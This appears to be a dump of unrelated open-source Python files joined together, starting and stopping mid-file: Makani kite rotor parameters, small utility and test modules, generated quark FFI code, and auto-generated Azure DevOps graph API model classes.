self.assertEqual(err.exception.args[0], "Edge is malformed")
def test_unknown_item(self):
with self.assertRaises(ValueError) as err:
Graph([(99, 1, 2)])
self.assertEqual(type(err.exception), ValueError)
self.assertEqual(err.exception.args[0], "Unknown item")
|
config/m600/rotors.py | leozz37/makani | 1,178 | 12634956 | # Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Rotor parameters."""
from makani.config import mconfig
from makani.control import system_types as m
import numpy as np
@mconfig.Config(deps={
'flight_plan': 'common.flight_plan',
'propellers': 'prop.propellers',
'wing_serial': 'common.wing_serial',
})
def MakeParams(params):
# Motor rotor moment-of-inertia [kg-m^2].
yasa_rotor_moment_of_inertia = 0.33
bottom_row = [m.kMotorSbo, m.kMotorSbi, m.kMotorPbi, m.kMotorPbo]
# Assign propeller versions.
propeller_versions = [None for _ in range(m.kNumMotors)]
if params['wing_serial'] == m.kWingSerial01:
propeller_versions[m.kMotorSbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorPto] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPti] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSti] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSto] = m.kPropVersionRev4PositiveX
elif params['wing_serial'] in [m.kWingSerial04Crosswind]:
propeller_versions[m.kMotorSbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorPto] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPti] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSti] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSto] = m.kPropVersionRev4PositiveX
elif params['wing_serial'] == m.kWingSerial04Hover:
propeller_versions[m.kMotorSbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorPto] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPti] = m.kPropVersionRev1Trimmed
propeller_versions[m.kMotorSti] = m.kPropVersionRev1Trimmed
propeller_versions[m.kMotorSto] = m.kPropVersionRev4PositiveX
elif params['wing_serial'] in [m.kWingSerial05Crosswind]:
propeller_versions[m.kMotorSbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorPto] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPti] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSti] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSto] = m.kPropVersionRev4PositiveX
elif params['wing_serial'] == m.kWingSerial05Hover:
propeller_versions[m.kMotorSbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorPto] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPti] = m.kPropVersionRev1Trimmed
propeller_versions[m.kMotorSti] = m.kPropVersionRev1Trimmed
propeller_versions[m.kMotorSto] = m.kPropVersionRev4PositiveX
elif params['wing_serial'] in [m.kWingSerial06Crosswind]:
propeller_versions[m.kMotorSbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorPto] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPti] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSti] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSto] = m.kPropVersionRev4PositiveX
elif params['wing_serial'] == m.kWingSerial06Hover:
propeller_versions[m.kMotorSbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorPto] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPti] = m.kPropVersionRev1Trimmed
propeller_versions[m.kMotorSti] = m.kPropVersionRev1Trimmed
propeller_versions[m.kMotorSto] = m.kPropVersionRev4PositiveX
elif params['wing_serial'] in [m.kWingSerial07Crosswind]:
propeller_versions[m.kMotorSbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorPto] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPti] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSti] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSto] = m.kPropVersionRev4PositiveX
elif params['wing_serial'] == m.kWingSerial07Hover:
propeller_versions[m.kMotorSbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorPto] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPti] = m.kPropVersionRev1Trimmed
propeller_versions[m.kMotorSti] = m.kPropVersionRev1Trimmed
propeller_versions[m.kMotorSto] = m.kPropVersionRev4PositiveX
else:
assert False, 'Unknown wing serial.'
rotors = [None for _ in range(m.kNumMotors)]
for r in range(m.kNumMotors):
rotors[r] = {
# Normal vector to the propeller plane.
'axis': [np.cos(np.deg2rad(3.0)), 0.0, np.sin(np.deg2rad(3.0))],
# Direction cosine matrix from body to rotor frame.
'dcm_b2r': {'d': [[np.cos(np.deg2rad(-3.0)), 0.0,
np.sin(np.deg2rad(-3.0))],
[0.0, 1.0, 0.0],
[-np.sin(np.deg2rad(-3.0)), 0.0,
np.cos(np.deg2rad(-3.0))]]},
# Local pressure coefficient [#] at the rotor position. The
# pressure coefficient, C_P, is related to local airspeed
# through the equation:
#
# C_P = 1 - (v / v_freestream)^2
#
# There is a significant difference in airspeeds between the top
# and bottom propellers caused by the lift of the wing. These
# pressure coefficients are derived from CFD with the slatted
# kite at 4 deg alpha (https://goo.gl/yfkJJS)
'local_pressure_coeff': 0.1448 if r in bottom_row else -0.1501,
# The rotor direction, diameter [m] and moment of inertia [kg
# m^2] are set from the corresponding propeller's information.
'version': propeller_versions[r],
'dir': params['propellers'][propeller_versions[r]]['dir'],
'D': params['propellers'][propeller_versions[r]]['D'],
'I': (yasa_rotor_moment_of_inertia +
params['propellers'][propeller_versions[r]]['I']),
}
# We check that the rotor axis is normalized. because it is used
# to determine the force-moment conversion matrix in
# rotor_control.py.
assert abs(np.linalg.norm(rotors[r]['axis']) - 1.0) < 1e-9
# Rotor positions [m].
#
# Updated on 2015-01-22 based on the COM positions given by the Mass
# and Balance spreadsheet.
rotors[m.kMotorSbo]['pos'] = [1.613, 3.639, 1.597]
rotors[m.kMotorSbi]['pos'] = [1.613, 1.213, 1.597]
rotors[m.kMotorPbi]['pos'] = [1.613, -1.213, 1.597]
rotors[m.kMotorPbo]['pos'] = [1.613, -3.639, 1.597]
rotors[m.kMotorPto]['pos'] = [1.960, -3.639, -1.216]
rotors[m.kMotorPti]['pos'] = [1.960, -1.213, -1.216]
rotors[m.kMotorSti]['pos'] = [1.960, 1.213, -1.216]
rotors[m.kMotorSto]['pos'] = [1.960, 3.639, -1.216]
return rotors
|
tests/data/expected/parser/openapi/openapi_parser_parse_any/output.py | languitar/datamodel-code-generator | 891 | 12634960 | from __future__ import annotations
from typing import Any, Optional
from pydantic import BaseModel
class Item(BaseModel):
bar: Optional[Any] = None
foo: str
|
nipy/utils/utilities.py | bpinsard/nipy | 236 | 12634962 | <reponame>bpinsard/nipy
""" Collection of utility functions and classes
Some of these come from the matplotlib ``cbook`` module with thanks.
"""
from functools import reduce
from operator import mul
def is_iterable(obj):
""" Return True if `obj` is iterable
"""
try:
iter(obj)
except TypeError:
return False
return True
def is_numlike(obj):
""" Return True if `obj` looks like a number
"""
try:
obj + 1
except:
return False
return True
def seq_prod(seq, initial=1):
""" General product of sequence elements
Parameters
----------
seq : sequence
Iterable of values to multiply.
initial : object, optional
Initial value
Returns
-------
prod : object
Result of ``initial * seq[0] * seq[1] .. ``.
"""
return reduce(mul, seq, initial)
|
quarkc/test/ffi/expected/py/signatures/generics/pkg/__init__.py | datawire/quark | 112 | 12634971 | <filename>quarkc/test/ffi/expected/py/signatures/generics/pkg/__init__.py
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
from builtins import str as unicode
from quark_runtime import *
_lazyImport.plug("generics.pkg")
import quark.reflect
class Foo(object):
def foo(self):
return _cast(None, lambda: T)
def get(self):
raise NotImplementedError('`Foo.get` is an abstract method')
Foo.generics_pkg_Foo_quark_Object__ref = None
class StringFoo(_QObject):
def _init(self):
pass
def __init__(self): self._init()
def get(self):
return _cast(None, lambda: unicode)
def _getClass(self):
return u"generics.pkg.StringFoo"
def _getField(self, name):
return None
def _setField(self, name, value):
pass
def foo(self):
return _cast(None, lambda: unicode)
StringFoo.generics_pkg_StringFoo_ref = None
class Box(_QObject):
def _init(self):
self.contents = None
def __init__(self, contents):
self._init()
def _getClass(self):
return u"generics.pkg.Box<quark.Object>"
def _getField(self, name):
if ((name) == (u"contents")):
return (self).contents
return None
def _setField(self, name, value):
if ((name) == (u"contents")):
(self).contents = _cast(value, lambda: T)
class StringBox(Box):
def _init(self):
Box._init(self)
def __init__(self, contents):
super(StringBox, self).__init__(contents);
def _getClass(self):
return u"generics.pkg.StringBox"
def _getField(self, name):
if ((name) == (u"contents")):
return (self).contents
return None
def _setField(self, name, value):
if ((name) == (u"contents")):
(self).contents = _cast(value, lambda: unicode)
StringBox.generics_pkg_Box_quark_String__ref = None
StringBox.generics_pkg_StringBox_ref = None
def _lazy_import_quark_ffi_signatures_md():
import quark_ffi_signatures_md
globals().update(locals())
_lazyImport("import quark_ffi_signatures_md", _lazy_import_quark_ffi_signatures_md)
_lazyImport.pump("generics.pkg")
|
tests/test_core.py | kianmeng/keyring | 834 | 12634975 | <reponame>kianmeng/keyring
import keyring.core
def test_init_recommended(monkeypatch):
"""
Test filtering of backends to recommended ones (#117, #423).
"""
monkeypatch.setattr(keyring.core, 'set_keyring', lambda kr: None)
keyring.core.init_backend(keyring.core.recommended)
|
tests/base/__init__.py | ssato/python-anyconfig | 213 | 12634987 | <reponame>ssato/python-anyconfig
#
# Copyright (C) 2021 <NAME> <<EMAIL>>
# SPDX-License-Identifier: MIT
#
r"""Common test Utility functions, constants and global variables, etc.
"""
from .constants import TESTS_DIR, RES_DIR, NULL_CNTNR
from .collector import TDataCollector
from .datatypes import TData
from .utils import (
load_data, load_datasets_from_dir, maybe_data_path
)
__all__ = [
'TESTS_DIR', 'RES_DIR', 'NULL_CNTNR',
'TDataCollector',
'TData',
'load_data', 'load_datasets_from_dir', 'maybe_data_path'
]
# vim:sw=4:ts=4:et:
|
azure-devops/azext_devops/devops_sdk/v5_1/graph/models.py | keithlemon/azure-devops-cli-extension | 326 | 12635008 | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from msrest.serialization import Model
class Avatar(Model):
"""
:param is_auto_generated:
:type is_auto_generated: bool
:param size:
:type size: object
:param time_stamp:
:type time_stamp: datetime
:param value:
:type value: str
"""
_attribute_map = {
'is_auto_generated': {'key': 'isAutoGenerated', 'type': 'bool'},
'size': {'key': 'size', 'type': 'object'},
'time_stamp': {'key': 'timeStamp', 'type': 'iso-8601'},
'value': {'key': 'value', 'type': 'str'}
}
def __init__(self, is_auto_generated=None, size=None, time_stamp=None, value=None):
super(Avatar, self).__init__()
self.is_auto_generated = is_auto_generated
self.size = size
self.time_stamp = time_stamp
self.value = value
class GraphCachePolicies(Model):
"""
:param cache_size: Size of the cache
:type cache_size: int
"""
_attribute_map = {
'cache_size': {'key': 'cacheSize', 'type': 'int'}
}
def __init__(self, cache_size=None):
super(GraphCachePolicies, self).__init__()
self.cache_size = cache_size
class GraphDescriptorResult(Model):
"""
Subject descriptor of a Graph entity
:param _links: This field contains zero or more interesting links about the graph descriptor. These links may be invoked to obtain additional relationships or more detailed information about this graph descriptor.
:type _links: :class:`ReferenceLinks <azure.devops.v5_1.graph.models.ReferenceLinks>`
:param value:
:type value: :class:`str <azure.devops.v5_1.graph.models.str>`
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'value': {'key': 'value', 'type': 'str'}
}
def __init__(self, _links=None, value=None):
super(GraphDescriptorResult, self).__init__()
self._links = _links
self.value = value
class GraphFederatedProviderData(Model):
"""
Represents a set of data used to communicate with a federated provider on behalf of a particular user.
:param access_token: The access token that can be used to communicated with the federated provider on behalf on the target identity, if we were able to successfully acquire one, otherwise <code>null</code>, if we were not.
:type access_token: str
:param provider_name: The name of the federated provider, e.g. "github.com".
:type provider_name: str
:param subject_descriptor: The descriptor of the graph subject to which this federated provider data corresponds.
:type subject_descriptor: str
:param version: The version number of this federated provider data, which corresponds to when it was last updated. Can be used to prevent returning stale provider data from the cache when the caller is aware of a newer version, such as to prevent local cache poisoning from a remote cache or store. This is the app layer equivalent of the data layer sequence ID.
:type version: long
"""
_attribute_map = {
'access_token': {'key': 'accessToken', 'type': 'str'},
'provider_name': {'key': 'providerName', 'type': 'str'},
'subject_descriptor': {'key': 'subjectDescriptor', 'type': 'str'},
'version': {'key': 'version', 'type': 'long'}
}
def __init__(self, access_token=None, provider_name=None, subject_descriptor=None, version=None):
super(GraphFederatedProviderData, self).__init__()
self.access_token = access_token
self.provider_name = provider_name
self.subject_descriptor = subject_descriptor
self.version = version
class GraphGroupCreationContext(Model):
"""
Do not attempt to use this type to create a new group. This type does not contain sufficient fields to create a new group.
:param storage_key: Optional: If provided, we will use this identifier for the storage key of the created group
:type storage_key: str
"""
_attribute_map = {
'storage_key': {'key': 'storageKey', 'type': 'str'}
}
def __init__(self, storage_key=None):
super(GraphGroupCreationContext, self).__init__()
self.storage_key = storage_key
class GraphMembership(Model):
"""
Relationship between a container and a member
:param _links: This field contains zero or more interesting links about the graph membership. These links may be invoked to obtain additional relationships or more detailed information about this graph membership.
:type _links: :class:`ReferenceLinks <azure.devops.v5_1.graph.models.ReferenceLinks>`
:param container_descriptor:
:type container_descriptor: str
:param member_descriptor:
:type member_descriptor: str
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'container_descriptor': {'key': 'containerDescriptor', 'type': 'str'},
'member_descriptor': {'key': 'memberDescriptor', 'type': 'str'}
}
def __init__(self, _links=None, container_descriptor=None, member_descriptor=None):
super(GraphMembership, self).__init__()
self._links = _links
self.container_descriptor = container_descriptor
self.member_descriptor = member_descriptor
class GraphMembershipState(Model):
"""
Status of a Graph membership (active/inactive)
:param _links: This field contains zero or more interesting links about the graph membership state. These links may be invoked to obtain additional relationships or more detailed information about this graph membership state.
:type _links: :class:`ReferenceLinks <azure.devops.v5_1.graph.models.ReferenceLinks>`
:param active: When true, the membership is active
:type active: bool
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'active': {'key': 'active', 'type': 'bool'}
}
def __init__(self, _links=None, active=None):
super(GraphMembershipState, self).__init__()
self._links = _links
self.active = active
class GraphMembershipTraversal(Model):
"""
:param incompleteness_reason: Reason why the subject could not be traversed completely
:type incompleteness_reason: str
:param is_complete: When true, the subject is traversed completely
:type is_complete: bool
:param subject_descriptor: The traversed subject descriptor
:type subject_descriptor: :class:`str <azure.devops.v5_1.graph.models.str>`
:param traversed_subject_ids: Subject descriptor ids of the traversed members
:type traversed_subject_ids: list of str
:param traversed_subjects: Subject descriptors of the traversed members
:type traversed_subjects: list of :class:`str <azure.devops.v5_1.graph.models.str>`
"""
_attribute_map = {
'incompleteness_reason': {'key': 'incompletenessReason', 'type': 'str'},
'is_complete': {'key': 'isComplete', 'type': 'bool'},
'subject_descriptor': {'key': 'subjectDescriptor', 'type': 'str'},
'traversed_subject_ids': {'key': 'traversedSubjectIds', 'type': '[str]'},
'traversed_subjects': {'key': 'traversedSubjects', 'type': '[str]'}
}
def __init__(self, incompleteness_reason=None, is_complete=None, subject_descriptor=None, traversed_subject_ids=None, traversed_subjects=None):
super(GraphMembershipTraversal, self).__init__()
self.incompleteness_reason = incompleteness_reason
self.is_complete = is_complete
self.subject_descriptor = subject_descriptor
self.traversed_subject_ids = traversed_subject_ids
self.traversed_subjects = traversed_subjects
class GraphProviderInfo(Model):
"""
Who is the provider for this user and what is the identifier and domain that is used to uniquely identify the user.
:param descriptor: The descriptor is the primary way to reference the graph subject while the system is running. This field will uniquely identify the same graph subject across both Accounts and Organizations.
:type descriptor: str
:param domain: This represents the name of the container of origin for a graph member. (For MSA this is "Windows Live ID", for AAD the tenantID of the directory.)
:type domain: str
:param origin: The type of source provider for the origin identifier (ex: "aad", "msa")
:type origin: str
:param origin_id: The unique identifier from the system of origin. (For MSA this is the PUID in hex notation, for AAD this is the object id.)
:type origin_id: str
"""
_attribute_map = {
'descriptor': {'key': 'descriptor', 'type': 'str'},
'domain': {'key': 'domain', 'type': 'str'},
'origin': {'key': 'origin', 'type': 'str'},
'origin_id': {'key': 'originId', 'type': 'str'}
}
def __init__(self, descriptor=None, domain=None, origin=None, origin_id=None):
super(GraphProviderInfo, self).__init__()
self.descriptor = descriptor
self.domain = domain
self.origin = origin
self.origin_id = origin_id
class GraphScopeCreationContext(Model):
"""
This type is the subset of fields that can be provided by the user to create a Vsts scope. Scope creation is currently limited to internal back-compat scenarios. End users that attempt to create a scope with this API will fail.
:param admin_group_description: Set this field to override the default description of this scope's admin group.
:type admin_group_description: str
:param admin_group_name: All scopes have an Administrator Group that controls access to the contents of the scope. Set this field to use a non-default group name for that administrators group.
:type admin_group_name: str
:param creator_id: Set this optional field if this scope is created on behalf of a user other than the user making the request. This should be the Id of the user that is not the requester.
:type creator_id: str
:param name: The scope must be provided with a unique name within the parent scope. This means the created scope can have a parent or child with the same name, but no siblings with the same name.
:type name: str
:param scope_type: The type of scope being created.
:type scope_type: object
:param storage_key: An optional ID that uniquely represents the scope within it's parent scope. If this parameter is not provided, Vsts will generate on automatically.
:type storage_key: str
"""
_attribute_map = {
'admin_group_description': {'key': 'adminGroupDescription', 'type': 'str'},
'admin_group_name': {'key': 'adminGroupName', 'type': 'str'},
'creator_id': {'key': 'creatorId', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'scope_type': {'key': 'scopeType', 'type': 'object'},
'storage_key': {'key': 'storageKey', 'type': 'str'}
}
def __init__(self, admin_group_description=None, admin_group_name=None, creator_id=None, name=None, scope_type=None, storage_key=None):
super(GraphScopeCreationContext, self).__init__()
self.admin_group_description = admin_group_description
self.admin_group_name = admin_group_name
self.creator_id = creator_id
self.name = name
self.scope_type = scope_type
self.storage_key = storage_key
class GraphStorageKeyResult(Model):
"""
Storage key of a Graph entity
:param _links: This field contains zero or more interesting links about the graph storage key. These links may be invoked to obtain additional relationships or more detailed information about this graph storage key.
:type _links: :class:`ReferenceLinks <azure.devops.v5_1.graph.models.ReferenceLinks>`
:param value:
:type value: str
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'value': {'key': 'value', 'type': 'str'}
}
def __init__(self, _links=None, value=None):
super(GraphStorageKeyResult, self).__init__()
self._links = _links
self.value = value
class GraphSubjectBase(Model):
"""
:param _links: This field contains zero or more interesting links about the graph subject. These links may be invoked to obtain additional relationships or more detailed information about this graph subject.
:type _links: :class:`ReferenceLinks <azure.devops.v5_1.graph.models.ReferenceLinks>`
:param descriptor: The descriptor is the primary way to reference the graph subject while the system is running. This field will uniquely identify the same graph subject across both Accounts and Organizations.
:type descriptor: str
:param display_name: This is the non-unique display name of the graph subject. To change this field, you must alter its value in the source provider.
:type display_name: str
:param url: This url is the full route to the source resource of this graph subject.
:type url: str
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'descriptor': {'key': 'descriptor', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'}
}
def __init__(self, _links=None, descriptor=None, display_name=None, url=None):
super(GraphSubjectBase, self).__init__()
self._links = _links
self.descriptor = descriptor
self.display_name = display_name
self.url = url
class GraphSubjectLookup(Model):
"""
Batching of subjects to lookup using the Graph API
:param lookup_keys:
:type lookup_keys: list of :class:`GraphSubjectLookupKey <azure.devops.v5_1.graph.models.GraphSubjectLookupKey>`
"""
_attribute_map = {
'lookup_keys': {'key': 'lookupKeys', 'type': '[GraphSubjectLookupKey]'}
}
def __init__(self, lookup_keys=None):
super(GraphSubjectLookup, self).__init__()
self.lookup_keys = lookup_keys
class GraphSubjectLookupKey(Model):
"""
:param descriptor:
:type descriptor: :class:`str <azure.devops.v5_1.graph.models.str>`
"""
_attribute_map = {
'descriptor': {'key': 'descriptor', 'type': 'str'}
}
def __init__(self, descriptor=None):
super(GraphSubjectLookupKey, self).__init__()
self.descriptor = descriptor
class GraphUserCreationContext(Model):
"""
Do not attempt to use this type to create a new user. Use one of the subclasses instead. This type does not contain sufficient fields to create a new user.
:param storage_key: Optional: If provided, we will use this identifier for the storage key of the created user
:type storage_key: str
"""
_attribute_map = {
'storage_key': {'key': 'storageKey', 'type': 'str'}
}
def __init__(self, storage_key=None):
super(GraphUserCreationContext, self).__init__()
self.storage_key = storage_key
class GraphUserUpdateContext(Model):
"""
Do not attempt to use this type to update user. Use one of the subclasses instead. This type does not contain sufficient fields to create a new user.
:param storage_key: Storage key should not be specified in case of updating user
:type storage_key: str
"""
_attribute_map = {
'storage_key': {'key': 'storageKey', 'type': 'str'}
}
def __init__(self, storage_key=None):
super(GraphUserUpdateContext, self).__init__()
self.storage_key = storage_key
class JsonPatchOperation(Model):
"""
The JSON model for a JSON Patch operation
:param from_: The path to copy from for the Move/Copy operation.
:type from_: str
:param op: The patch operation
:type op: object
:param path: The path for the operation. In the case of an array, a zero based index can be used to specify the position in the array (e.g. /biscuits/0/name). The "-" character can be used instead of an index to insert at the end of the array (e.g. /biscuits/-).
:type path: str
:param value: The value for the operation. This is either a primitive or a JToken.
:type value: object
"""
_attribute_map = {
'from_': {'key': 'from', 'type': 'str'},
'op': {'key': 'op', 'type': 'object'},
'path': {'key': 'path', 'type': 'str'},
'value': {'key': 'value', 'type': 'object'}
}
def __init__(self, from_=None, op=None, path=None, value=None):
super(JsonPatchOperation, self).__init__()
self.from_ = from_
self.op = op
self.path = path
self.value = value
class PagedGraphGroups(Model):
"""
:param continuation_token: This will be non-null if there is another page of data. There will never be more than one continuation token returned by a request.
:type continuation_token: list of str
:param graph_groups: The enumerable list of groups found within a page.
:type graph_groups: list of :class:`GraphGroup <azure.devops.v5_1.graph.models.GraphGroup>`
"""
_attribute_map = {
'continuation_token': {'key': 'continuationToken', 'type': '[str]'},
'graph_groups': {'key': 'graphGroups', 'type': '[GraphGroup]'}
}
def __init__(self, continuation_token=None, graph_groups=None):
super(PagedGraphGroups, self).__init__()
self.continuation_token = continuation_token
self.graph_groups = graph_groups
class PagedGraphUsers(Model):
"""
:param continuation_token: This will be non-null if there is another page of data. There will never be more than one continuation token returned by a request.
:type continuation_token: list of str
:param graph_users: The enumerable set of users found within a page.
:type graph_users: list of :class:`GraphUser <azure.devops.v5_1.graph.models.GraphUser>`
"""
_attribute_map = {
'continuation_token': {'key': 'continuationToken', 'type': '[str]'},
'graph_users': {'key': 'graphUsers', 'type': '[GraphUser]'}
}
def __init__(self, continuation_token=None, graph_users=None):
super(PagedGraphUsers, self).__init__()
self.continuation_token = continuation_token
self.graph_users = graph_users
class ReferenceLinks(Model):
"""
The class to represent a collection of REST reference links.
:param links: The readonly view of the links. Because Reference links are readonly, we only want to expose them as read only.
:type links: dict
"""
_attribute_map = {
'links': {'key': 'links', 'type': '{object}'}
}
def __init__(self, links=None):
super(ReferenceLinks, self).__init__()
self.links = links
class GraphSubject(GraphSubjectBase):
"""
Top-level graph entity
:param _links: This field contains zero or more interesting links about the graph subject. These links may be invoked to obtain additional relationships or more detailed information about this graph subject.
:type _links: :class:`ReferenceLinks <azure.devops.v5_1.graph.models.ReferenceLinks>`
:param descriptor: The descriptor is the primary way to reference the graph subject while the system is running. This field will uniquely identify the same graph subject across both Accounts and Organizations.
:type descriptor: str
:param display_name: This is the non-unique display name of the graph subject. To change this field, you must alter its value in the source provider.
:type display_name: str
:param url: This url is the full route to the source resource of this graph subject.
:type url: str
:param legacy_descriptor: [Internal Use Only] The legacy descriptor is here in case you need to access old version IMS using identity descriptor.
:type legacy_descriptor: str
:param origin: The type of source provider for the origin identifier (ex:AD, AAD, MSA)
:type origin: str
:param origin_id: The unique identifier from the system of origin. Typically a sid, object id or Guid. Linking and unlinking operations can cause this value to change for a user because the user is not backed by a different provider and has a different unique id in the new provider.
:type origin_id: str
:param subject_kind: This field identifies the type of the graph subject (ex: Group, Scope, User).
:type subject_kind: str
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'descriptor': {'key': 'descriptor', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'legacy_descriptor': {'key': 'legacyDescriptor', 'type': 'str'},
'origin': {'key': 'origin', 'type': 'str'},
'origin_id': {'key': 'originId', 'type': 'str'},
'subject_kind': {'key': 'subjectKind', 'type': 'str'}
}
def __init__(self, _links=None, descriptor=None, display_name=None, url=None, legacy_descriptor=None, origin=None, origin_id=None, subject_kind=None):
super(GraphSubject, self).__init__(_links=_links, descriptor=descriptor, display_name=display_name, url=url)
self.legacy_descriptor = legacy_descriptor
self.origin = origin
self.origin_id = origin_id
self.subject_kind = subject_kind
class GraphMember(GraphSubject):
"""
:param _links: This field contains zero or more interesting links about the graph subject. These links may be invoked to obtain additional relationships or more detailed information about this graph subject.
:type _links: :class:`ReferenceLinks <azure.devops.v5_1.graph.models.ReferenceLinks>`
:param descriptor: The descriptor is the primary way to reference the graph subject while the system is running. This field will uniquely identify the same graph subject across both Accounts and Organizations.
:type descriptor: str
:param display_name: This is the non-unique display name of the graph subject. To change this field, you must alter its value in the source provider.
:type display_name: str
:param url: This url is the full route to the source resource of this graph subject.
:type url: str
:param legacy_descriptor: [Internal Use Only] The legacy descriptor is here in case you need to access old version IMS using identity descriptor.
:type legacy_descriptor: str
:param origin: The type of source provider for the origin identifier (ex:AD, AAD, MSA)
:type origin: str
:param origin_id: The unique identifier from the system of origin. Typically a sid, object id or Guid. Linking and unlinking operations can cause this value to change for a user because the user is not backed by a different provider and has a different unique id in the new provider.
:type origin_id: str
:param subject_kind: This field identifies the type of the graph subject (ex: Group, Scope, User).
:type subject_kind: str
:param domain: This represents the name of the container of origin for a graph member. (For MSA this is "Windows Live ID", for AD the name of the domain, for AAD the tenantID of the directory, for VSTS groups the ScopeId, etc)
:type domain: str
:param mail_address: The email address of record for a given graph member. This may be different than the principal name.
:type mail_address: str
:param principal_name: This is the PrincipalName of this graph member from the source provider. The source provider may change this field over time and it is not guaranteed to be immutable for the life of the graph member by VSTS.
:type principal_name: str
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'descriptor': {'key': 'descriptor', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'legacy_descriptor': {'key': 'legacyDescriptor', 'type': 'str'},
'origin': {'key': 'origin', 'type': 'str'},
'origin_id': {'key': 'originId', 'type': 'str'},
'subject_kind': {'key': 'subjectKind', 'type': 'str'},
'domain': {'key': 'domain', 'type': 'str'},
'mail_address': {'key': 'mailAddress', 'type': 'str'},
'principal_name': {'key': 'principalName', 'type': 'str'}
}
def __init__(self, _links=None, descriptor=None, display_name=None, url=None, legacy_descriptor=None, origin=None, origin_id=None, subject_kind=None, domain=None, mail_address=None, principal_name=None):
super(GraphMember, self).__init__(_links=_links, descriptor=descriptor, display_name=display_name, url=url, legacy_descriptor=legacy_descriptor, origin=origin, origin_id=origin_id, subject_kind=subject_kind)
self.domain = domain
self.mail_address = mail_address
self.principal_name = principal_name
class GraphScope(GraphSubject):
"""
Container where a graph entity is defined (organization, project, team)
